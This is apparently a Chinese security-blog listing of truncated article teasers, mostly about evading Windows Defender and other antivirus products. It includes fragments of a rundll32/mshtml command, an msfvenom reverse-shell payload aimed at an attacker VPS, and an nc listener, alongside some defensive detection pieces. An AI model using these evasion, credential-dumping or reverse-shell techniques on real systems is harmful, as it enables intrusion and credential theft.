C:sec>rundll32.exe javascript:"....mshtml,,RunHTMLApplication ";alert(13) Access is denied.&...
一键关闭Windows 8.x、 10(各版本)和 11 上的Windows Defender
免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立...
『免杀系列』免杀 Fscan
点击蓝字·关注我们 日期:2024-01-30作者:Corl7介绍:免杀 Fscan 过火绒、3某0、Defender。 0x00 前言 在打攻防时,Fscan落地就被杀,于是就萌生了免杀Fscan的...
About通过远程加载AES + XOR异或加密shellcode的免杀加载器,过主流杀软。
BypassLoad通过远程加载AES + XOR异或加密shellcode的免杀加载器,无过多技术细节。shellcode360杀毒火绒Defender腾讯电脑管家VTMeterpreter√√√√...
结合使用 MiniDumpWriteDump、Donut 和进程注入技术来逃避 Windows Defender 检测
在当今的环境中,Mimikatz(一种凭据转储工具)可以被每个 Windows Defender 防病毒软件和 EDR 检测到。这就是为什么某些威胁行为者选择使用 Minidump 等工具而不是 Mi...
洞见简报【2024/1/28】
2024-01-28 微信公众号精选安全技术文章总览洞见网安 2024-01-280x1 结合使用 MiniDumpWriteDump、Donut 和进程注入技术来逃避 Windows Defende...
技术实践|勒索病毒防御削弱技术对抗研究
前言01随着勒索病毒的猖獗,各种勒索病毒加密技术与防御对抗技术也在不断升级,即使对于有一定防御建设水平的企业来说,勒索病毒带来的损失也不能忽略。为了更好地对抗勒索病毒,我们有必要持续研究其防御削弱对抗...
Python免杀shellcode篇-反序列化过360核晶-火绒-Windows defender
反序列化+远程分离免杀+反沙箱 首先也是通过 msfvenom -p windows/x64/meterpreter/reverse LHOST=你的vps地址 LPORT=4444 -f c -b ...
PHEMEDRONE信息窃取者活动利用Windows SmartScreen绕过漏洞
翻译:Trend Micro的研究人员发现了一种利用漏洞CVE-2023-36025(CVSS评分8.8)的恶意软件攻击活动,以部署先前未知的恶意软件Phemedrone Stealer。这个漏洞已经...
绕过Credential Guard 读取明文凭据
Tips +1 前言 Windows 10 之前,Lsass 将操作系统所使用的密码存储在其进程内存中 当我们获取到机器权限后,经常使用Mimikatz在机器上获取各种凭证,包括明文密码,NTLM哈希...
神兵利器 - 可以绕过 Windows Defender 检测的反向 Shell
地址:https://github.com/emrekybs/nim-shell$ apt install nim监听 $ nc -nvlp 4444原文始发于微信公众号(TtTeam):神兵利器 -...
【威胁感知】ATT&CK攻击链规则之Webshell检测与实践
0x00故事是这样的 1、在之前的文章《【威胁感知】ATT&CK攻击链规则检测梳理实践》中,我们详细介绍了如何检测文件重命名Windows勒索软件的监测。 2、本次将阐述T1505_003对应...
14